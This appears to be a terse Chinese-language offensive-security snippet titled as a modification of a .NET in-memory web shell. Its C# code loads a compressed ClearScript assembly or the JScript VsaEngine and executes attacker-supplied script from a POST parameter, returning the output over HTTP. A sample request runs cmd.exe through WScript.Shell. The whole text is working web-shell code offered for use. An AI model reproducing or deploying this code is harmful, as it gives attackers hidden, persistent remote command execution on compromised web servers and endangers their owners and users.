.Net 内存马改造

String script = postParams[pass];String encoded_compressed_file = @"dll的base64";var outputStream = new MemoryStream(Convert.FromBase64String(encoded_compressed_file));DeflateStream l_Stream = new DeflateStream(outputStream, CompressionMode.Decompress);var UncompressedFileBytes = new byte[478720];l_Stream.Read(UncompressedFileBytes, 0, 478720);Assembly assem = Assembly.Load(UncompressedFileBytes);Type jscriptengineType = assem.GetType("Microsoft.ClearScript.Windows.JScriptEngine");Type xhostType = assem.GetType("Microsoft.ClearScript.ExtendedHostFunctions");object jscriptengine = Activator.CreateInstance(jscriptengineType);object xhost = Activator.CreateInstance(xhostType);PropertyInfo reflection = jscriptengineType.GetProperty("AllowReflection");reflection.SetValue(jscriptengine, false);jscriptengineType.InvokeMember("AddHostObject", BindingFlags.InvokeMethod, null, jscriptengine, new[] { "xHost", xhost });jscriptengineType.InvokeMember("Execute", BindingFlags.InvokeMethod, null, jscriptengine, new[] { script });

-H "Type: cmd"  -d "pass=new ActiveXObject('Wscript.Shell').Exec('cmd.exe /c calc.exe')"

Microsoft.JScript.Vsa.VsaEngine vsaEngine = Microsoft.JScript.Vsa.VsaEngine.CreateEngine();script = Encoding.ASCII.GetString(Encoding.UTF8.GetBytes(script));object obj = Microsoft.JScript.Eval.JScriptEvaluate(script,vsaEngine);byte[] data = Encoding.UTF8.GetBytes((string) obj);response.StatusCode = 200;response.ContentLength64 = data.Length;stm = response.OutputStream;stm.Write(data, 0, data.Length);